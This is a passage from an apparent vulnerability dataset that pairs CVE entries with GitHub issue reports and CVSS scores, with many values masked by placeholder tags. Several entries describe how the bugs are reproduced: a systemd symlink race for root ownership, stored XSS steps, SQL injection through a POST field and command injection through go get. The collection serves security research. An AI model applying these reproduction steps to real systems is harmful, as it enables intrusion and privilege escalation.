        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/27",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/27",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-02-03T12:58:47Z",
        "description": "stack buffer overflow while running wavpack. Forwarding a bug report we received in the Debian bug tracker ( CVETAG stack buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises stack buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG This bug was found with a fuzzer developed by APITAG group at KAIST poc.wav can be downloaded from CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-6846",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/176",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/176",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2018-02-08T09:14:41Z",
        "description": "PATHTAG \u7206\u7269\u7406\u8def\u5f84. PATHTAG Code\uff1a class Upload extends Base { Rows NUMBERTAG Return error \uff1a Fatal error: Class APITAG not found in PATHTAG on line NUMBERTAG Harm\uff1a Web site physical path leakage .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6869",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/22",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/22",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-02-08T17:32:05Z",
        "description": "Uncontrolled memory allocation in __zzip_parse_root_directory ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib, there is an uncontrolled memory allocation and a crash in __zzip_parse_root_directory function of PATHTAG which could be triggered by the POC below. The issue happens since in line NUMBERTAG of PATHTAG file, the request size of malloc (i.e., zz_rootsize) could be manipulated by an input file. Note that this function is in libzzip NUMBERTAG APITAG fd NUMBERTAG struct _disk_trailer trailer NUMBERTAG hdr0 = (struct zzip_dir_hdr ) malloc(zz_rootsize NUMBERTAG To reproduce the issue, run ./zzdir $POC POC: FILETAG back stack NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG b NUMBERTAG bytes of APITAG (errno NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG ff NUMBERTAG ba NUMBERTAG ff NUMBERTAG bb NUMBERTAG ff NUMBERTAG bc NUMBERTAG ff NUMBERTAG bd NUMBERTAG ff NUMBERTAG bdb NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG ff NUMBERTAG e NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG b NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG f NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG eb NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb NUMBERTAG ff NUMBERTAG eb2a NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb2a NUMBERTAG ff NUMBERTAG eb2b NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb2b NUMBERTAG ff NUMBERTAG eb NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG eeff NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eeff NUMBERTAG ff NUMBERTAG f0ff NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f0ff NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG e NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG b NUMBERTAG ff NUMBERTAG f NUMBERTAG b NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG ab NUMBERTAG ff NUMBERTAG ab NUMBERTAG ff NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ff NUMBERTAG ff NUMBERTAG ff NUMBERTAG c NUMBERTAG ff NUMBERTAG c NUMBERTAG ff NUMBERTAG cc NUMBERTAG ff NUMBERTAG cc NUMBERTAG ff NUMBERTAG cd NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG cd NUMBERTAG ff NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ce NUMBERTAG ff NUMBERTAG cf NUMBERTAG ffcd NUMBERTAG ffcd NUMBERTAG a NUMBERTAG stack NUMBERTAG ffcd NUMBERTAG ff NUMBERTAG ffcd NUMBERTAG dso NUMBERTAG ffffffffff NUMBERTAG ffffffffff NUMBERTAG syscall] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG ff NUMBERTAG f5dba NUMBERTAG APITAG NUMBERTAG ff NUMBERTAG f5e NUMBERTAG e3 in APITAG const , int, char const , unsigned long long, unsigned long long) APITAG NUMBERTAG ff NUMBERTAG f5e8a NUMBERTAG APITAG NUMBERTAG ff NUMBERTAG f NUMBERTAG e0cc APITAG NUMBERTAG ff NUMBERTAG f5d NUMBERTAG e7 in malloc APITAG NUMBERTAG ff NUMBERTAG f NUMBERTAG fc3 in __zzip_parse_root_directory PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG b8c in __zzip_dir_parse PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG b8c in zzip_dir_fdopen_ext_io PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f8b in zzip_opendir_ext_io PATHTAG NUMBERTAG f2e in main PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ec ( PATHTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6876",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/973",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/973",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-02-07T08:38:19Z",
        "description": "stack buffer underflow. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib cairo djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw rsvg tiff webp wmf x xml zlib libfpx PATHTAG ASAN OUTPUT APITAG > PATHTAG convert FILETAG not_kitty.FPX APITAG NUMBERTAG ERROR: APITAG stack buffer underflow on address NUMBERTAG bfb NUMBERTAG at pc NUMBERTAG aff NUMBERTAG b8 bp NUMBERTAG bfb NUMBERTAG f8 sp NUMBERTAG bfb NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG bfb NUMBERTAG thread T NUMBERTAG aff NUMBERTAG b7 in APITAG const&) PATHTAG NUMBERTAG afdece4b in APITAG PATHTAG NUMBERTAG afdef6f9 in APITAG PATHTAG NUMBERTAG afdf NUMBERTAG in APITAG char const , APITAG unsigned int) PATHTAG NUMBERTAG afe NUMBERTAG in APITAG int, int, float, APITAG unsigned long, APITAG unsigned char, unsigned char) PATHTAG NUMBERTAG afe3df6c in APITAG unsigned int, unsigned int, unsigned int, unsigned int, APITAG APITAG APITAG APITAG ) PATHTAG NUMBERTAG afe3e NUMBERTAG in APITAG PATHTAG NUMBERTAG b3c6ba NUMBERTAG in APITAG APITAG NUMBERTAG b NUMBERTAG f in APITAG APITAG NUMBERTAG b NUMBERTAG c1f in APITAG APITAG NUMBERTAG b5b NUMBERTAG e4a in APITAG APITAG NUMBERTAG b5d NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG abe in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG fb ( PATHTAG ) POC FILETAG System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6883",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/839",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/839",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2018-02-11T09:25:23Z",
        "description": "Piwigo NUMBERTAG SQL injection in administration panel. An SQL injection has been discovered in the administration panel of Piwigo NUMBERTAG The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query. This could result in full information disclosure. The SQL injection vulnerability was found in FILETAG and is done by injecting SQL code in the 'tags' POST variable. This variable is only sanitized by APITAG and is not encapsulated by quotes in the concatenated SQL string allowing the injection to work. Furthermore, the result set is part of the page output allowing information disclosure about other tables in the database. The POST variables 'edit_list' and 'merge_list' are also vulnerable to this attack, however, no exploit exist to disclose information through these variables. A separate vulnerability report was made for 'edit_list' ( CVETAG , issue NUMBERTAG The security risk of the vulnerabilities are estimated as low with a CVSS score of NUMBERTAG Exploitation of the web vulnerability requires the attacker to be authenticated as administrator. A APITAG can be provided. I'm tracking this under CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-6930",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/967",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/967",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-31T05:55:36Z",
        "description": "Stack over read in APITAG due to type mismatch. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I found that magick reads a buffer over the buffer size at the following line. URLTAG The above line reads APITAG as much as APITAG that is APITAG because APITAG is declared as a double type, on the other hand, the size of APITAG is APITAG because it's a float array. URLTAG I can reproduce this crash only in NUMBERTAG bit machine, I'm not sure why. also, this requires APITAG support. Steps to Reproduce Compile APITAG with address sanitizer in NUMBERTAG bit mode, and use this FILETAG to run magick. this crash is triggered when it's zooming, so I added APITAG option. ERRORTAG System Configuration APITAG version NUMBERTAG bit Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Found by Choongwoo Han and Kyeongseok Yang, Naver Security Team",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6948",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/193",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/193",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2018-02-13T15:19:56Z",
        "description": "ccnl_prefix_to_str_detailed can overrun when using NFN. The function ccnl_prefix_to_str_detailed can cause an bufferoverflow, when writing a prefix to the buffer buf. Maximal size of the prefix is CCNL_MAX_PREFIX_SIZE, the buffer has the size CCNL_MAX_PREFIX_SIZE. However, if when NFN is enabled, additional characters are written to the buffer (e.g. the \"NFN\" and the \"R2C\" tags). Therefore, sending a NFN R2C packet with a prefix with the size of CCNL_MAX_PREFIX_SIZE can cause a overflow of buf inside ccnl_prefix_to_str_detailed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6953",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/195",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/195",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2018-02-13T17:02:29Z",
        "description": "NDNTLV parser accepts Length field of the Name without any checks. The Parser of NDNTLV accepts Length field of the Name without any checks. Therefore, it is possible, that the value of the length flied of a component of a prefix and the actual size of the component differ. in APITAG : CODETAG This issue can lead to a out of bound memory access, when executing ccnl_ndntlv_dehead again. Additionally, on many places CCN lite assumes, that the length of the prefix is always correct. By not having the length matching the actual component length, buffer overflows or out of bound memory accesses can occur on many places, e.g.: APITAG : buffer overflow, APITAG copies to many bytes if p >complen[i]) > len(prefix >comp[i]), which can lead to a buffer overflow of p >bytes APITAG : out of bound memory access, APITAG APITAG : out of bound memory access, APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6954",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/7986",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/7986",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2018-01-24T14:09:49Z",
        "description": "tmpfiles: symlinks are followed in non terminal path components. Sorry to keep harassing you with these. I think APITAG is following symlinks that don't appear as the last path component. In other words, if we are at the point where tmpfiles is about to APITAG , then I can replace the \"foo\" component with a symlink to APITAG , resulting in APITAG and a fairly easy root exploit for any Z type. Same disclaimer: I'm running tmpfiles from a git checkout, but not booting systemd. Now I have APITAG and APITAG . I'm using the same tmpfiles.d entry as before, CODETAG I start the service once, so that APITAG exists: APITAG Now, as the owner (mjo) of APITAG , I can do, in another terminal, APITAG The NUMBERTAG dummy files buy some time to swap in the symlink before the loop gets to passwd . Now, restart the service back in the first terminal... APITAG And while that is busy looping on the NUMBERTAG dummy files, swap out foo with a symlink in the second terminal: APITAG (I've used \"mv\" because \"rm\" is ironically slow at deleting my own dummy files.) The end result is that I wind up as the owner of APITAG , and the APITAG sysctl doesn't protect against this.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7035",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/794",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/794",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-02-16T06:48:23Z",
        "description": "Stored XSS via blog. Description: Cross site scripting (XSS) vulnerability in Gleez CMS might allow remote attackers (users) to inject arbitrary web script or HTML via the source editor, which will result in Stored XSS when an Administrator tries to edit the post. Vulnerability Type: Stored XSS Attack Vectors NUMBERTAG Login as user on Gleez CMS NUMBERTAG Click on Blogs > Add Blog NUMBERTAG Change to HTML mode in content bo NUMBERTAG Add XSS Payload : APITAG src=\"x\" APITAG style NUMBERTAG Save the blog NUMBERTAG Login as Administrator NUMBERTAG Goto Blogs NUMBERTAG Open the malicious blog and click on edit NUMBERTAG SS! Attack Impact: This could be used to perform actions against the administrators (or any user editing that post) and could potentially lead to hijacking the user\u2019s session/token. This could happen by users navigating to the attacker\u2019s post on their own, or by the attacker somehow persuading the victim to navigate to the post. Note: It'll not result into XSS in the normal view mode, but when admin or other user will try to edit the post code will be APITAG XSS from User to Admin.]",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-7039",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/191",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/191",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2018-02-13T10:15:53Z",
        "description": "buffer overflow in APITAG Hi, I think that there are multiple issues with various APITAG functions. I've picked the APITAG as an example. The len parameter refers to the size of the blob and offset to the position where the data in blob should be written to buf . The function returns NUMBERTAG if the offset is lower than the size of the blob which is prepended to the buffer (basically if somebody tries to write before the buffer ( buffer underwrite CVETAG . ERRORTAG I've made a short illustration depicting valid input parameters and the result after the memcpy operation. FILETAG Do you agree? Anyway, why are length and offset int parameters? TIA Michael",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7187",
        "Issue_Url_old": "https://github.com/golang/go/issues/23867",
        "Issue_Url_new": "https://github.com/golang/go/issues/23867",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-02-16T01:43:54Z",
        "description": "cmd/go: arbitrary command execution via VCS path. I contacted EMAILTAG rg about this and was allowed to create a public issue. What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? Yes. What did you do? I've noticed that go get is vulnerable to arbitrary command execution via VCS path command injection due to lack of repository URL validation. This command should execute APITAG on the target system: go get insecure APITAG vuln See URLTAG APITAG The proof of concept presented above is targeting Mercurial. What did you expect to see? ERRORTAG What did you see instead? APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7197",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/47",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/47",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2018-02-17T18:52:49Z",
        "description": "Stored XSS due to Unsantized Url embedding. Hello In addition to the command injection that was mentioned in one of the preceding issues, it's also vulnerable to stored XSS. Reproduction is quite easy NUMBERTAG First install cms, login with administrator to create a blog, create a page and insert blog to it, then logout as admin NUMBERTAG Then we go our blog post and file out the reaction information. We fill in PATHTAG with generic information. For our url we'll provide this string, URLTAG \"> APITAG FILETAG NUMBERTAG Once we submit we'll get met with an alert echo'ing our website's domain name/",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7225",
        "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/218",
        "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/218",
        "Repo_new": "libvnc/libvncserver",
        "Issue_Created_At": "2018-02-18T17:30:45Z",
        "description": "Security: libvncserver/rfbserver.c: APITAG case APITAG doesn't sanitize APITAG While I consider this a security relevant issue, I feel there's no overall benefit from reporting it under an embargo, so here goes. libvncserver/rfbserver.c: APITAG contains the following code: ERRORTAG This passes the client provided NUMBERTAG bit message length field's value directly into APITAG , reads up to this many bytes from the client, and then passes the full value to the library user provided APITAG callback (where the value might be higher than the number of bytes actually read with uninitialized and potentially sensitive data afterwards and it might also be too high for the callback's implementation to handle safely). There may also be integer overflow in the addition of APITAG (which is NUMBERTAG to the value in the call to APITAG ; I did not look into what consequences this might have. I first found the issue during Openwall's security audit of the Virtuozzo NUMBERTAG product, which uses a RHEL7 derived package of APITAG NUMBERTAG from its prl vzvncserver component. A corresponding Virtuozzo NUMBERTAG fix is: URLTAG which hardens prl vzvncserver's APITAG callback but the rest of the issue needs to be fixed in libvncserver itself, hence the (belated) report in here. We would like to thank the Virtuozzo company for funding the effort. Included below is the relevant excerpt from our Virtuozzo NUMBERTAG report: cut NUMBERTAG PSBM NUMBERTAG prl vzvncserver and APITAG integer overflows, unlimited memory allocations, and unchecked APITAG Severity: medium Thread NUMBERTAG prl vzvncserver\" A particular combination of these NUMBERTAG problems is demonstrated by sending the output of APITAG to prl vzvncserver's TCP port, when prl vzvncserver is running without password. APITAG running with password, authentication would be needed before the specific vulnerable code can be reached, and the string to send would accordingly be longer.) This first causes APITAG to allocate NUMBERTAG APITAG of address space and then to hand out this uninitialized memory to the prl vzvncserver/console.c: APITAG callback, which would attempt to make another similar allocation and make a copy of the data. Unfortunately, this APITAG API, as well as many others, is defined to use \"int\" rather than \"size_t\" for data sizes, and indeed prl vzvncserver uses \"int\" too. For this particular request, this results in a zero byte allocation with APITAG which succeeds, and then in a APITAG of (size_t NUMBERTAG bytes to it. With a range of other similar requests, APITAG may instead be made to fail (for trying to allocate a ridiculous amount of address space, sign extended to NUMBERTAG bit), in which case the APITAG more reliably fails on a NULL pointer dereference. Either way, the service crashes. Finally, it is possible to have the process actually write to (and thus allocate for real) almost NUMBERTAG APITAG of memory with one request, by making the length field just below NUMBERTAG APITAG If no data is sent, then NUMBERTAG APITAG would be written from the uninitialized memory (likely mostly read as zero) to the memory allocated by prl vzvncserver's callback. If the data is actually sent, then first it is written to memory by APITAG and then is copied by the callback, for NUMBERTAG APITAG total. Exploitability of this specific issue into something worse than these varying possibilities is highly doubtful (although exploitation of unlimited size APITAG is not unheard of), but all NUMBERTAG of these issues are prevalent in prl vzvncserver and APITAG code in general, so maybe the impact of another similar issue would more obviously be worse. We recommend that sanity checks be introduced into APITAG so that it doesn't try to allocate unreasonable amounts of memory and pass unsafe sizes to callbacks. We also recommend prl vzvncserver to sanity check its inputs (including received from APITAG and in this way avoid integer overflows and unreasonably large allocations. Finally, it is good practice to check whether a APITAG succeeded before writing to the memory. The function APITAG came from PATHTAG so its shortcomings also need to be reported to APITAG upstream. Fix: Some aspects of this issue, most importantly covering prl vzvncserver's APITAG callback, have been addressed with commit NUMBERTAG a NUMBERTAG d NUMBERTAG c NUMBERTAG a2be ERRORTAG dd4b NUMBERTAG bb NUMBERTAG b2c5 on NUMBERTAG Related: FILETAG URLTAG cut APITAG mentioned above appears to be no longer part of libvncserver, hence is not otherwise included in description of this issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7226",
        "Issue_Url_old": "https://github.com/LibVNC/vncterm/issues/6",
        "Issue_Url_new": "https://github.com/libvnc/vncterm/issues/6",
        "Repo_new": "libvnc/vncterm",
        "Issue_Created_At": "2018-02-18T21:05:27Z",
        "description": "Security: APITAG APITAG integer overflow and unchecked APITAG While I consider this a security relevant issue, I feel there's no overall benefit from reporting it under an embargo, so here goes. As I reported in URLTAG APITAG APITAG callback API is poorly defined (with int instead of APITAG ) and poorly used by APITAG (without sanitization of the length, and passing in the client specified full length even if fewer bytes were actually read from the client). I also mentioned callback implementation side issues, as illustrated by prl vzvncserver's callback, which was based off vncterm's (hence the report in here) and which has since been fixed in prl vzvncserver. vncterm's implementation of the callback was and still is: CODETAG Besides the conversion to signed int during the call, there's also APITAG in the implementation, which may cause an integer overflow resulting in e.g. APITAG (which succeeds) followed by APITAG (which writes beyond the allocated memory). And there's no check for APITAG possibly returning NULL. I first found the issue during Openwall's security audit of the Virtuozzo NUMBERTAG product, which reuses this code in its prl vzvncserver component. A corresponding Virtuozzo NUMBERTAG fix is: URLTAG We would like to thank the Virtuozzo company for funding the effort. Included below is the relevant excerpt from our Virtuozzo NUMBERTAG report: cut NUMBERTAG PSBM NUMBERTAG prl vzvncserver and APITAG integer overflows, unlimited memory allocations, and unchecked APITAG Severity: medium Thread NUMBERTAG prl vzvncserver\" A particular combination of these NUMBERTAG problems is demonstrated by sending the output of APITAG to prl vzvncserver's TCP port, when prl vzvncserver is running without password. APITAG running with password, authentication would be needed before the specific vulnerable code can be reached, and the string to send would accordingly be longer.) This first causes APITAG to allocate NUMBERTAG APITAG of address space and then to hand out this uninitialized memory to the prl vzvncserver/console.c: APITAG callback, which would attempt to make another similar allocation and make a copy of the data. Unfortunately, this APITAG API, as well as many others, is defined to use \"int\" rather than \"size_t\" for data sizes, and indeed prl vzvncserver uses \"int\" too. For this particular request, this results in a zero byte allocation with APITAG which succeeds, and then in a APITAG of (size_t NUMBERTAG bytes to it. With a range of other similar requests, APITAG may instead be made to fail (for trying to allocate a ridiculous amount of address space, sign extended to NUMBERTAG bit), in which case the APITAG more reliably fails on a NULL pointer dereference. Either way, the service crashes. Finally, it is possible to have the process actually write to (and thus allocate for real) almost NUMBERTAG APITAG of memory with one request, by making the length field just below NUMBERTAG APITAG If no data is sent, then NUMBERTAG APITAG would be written from the uninitialized memory (likely mostly read as zero) to the memory allocated by prl vzvncserver's callback. If the data is actually sent, then first it is written to memory by APITAG and then is copied by the callback, for NUMBERTAG APITAG total. Exploitability of this specific issue into something worse than these varying possibilities is highly doubtful (although exploitation of unlimited size APITAG is not unheard of), but all NUMBERTAG of these issues are prevalent in prl vzvncserver and APITAG code in general, so maybe the impact of another similar issue would more obviously be worse. We recommend that sanity checks be introduced into APITAG so that it doesn't try to allocate unreasonable amounts of memory and pass unsafe sizes to callbacks. We also recommend prl vzvncserver to sanity check its inputs (including received from APITAG and in this way avoid integer overflows and unreasonably large allocations. Finally, it is good practice to check whether a APITAG succeeded before writing to the memory. The function APITAG came from PATHTAG so its shortcomings also need to be reported to 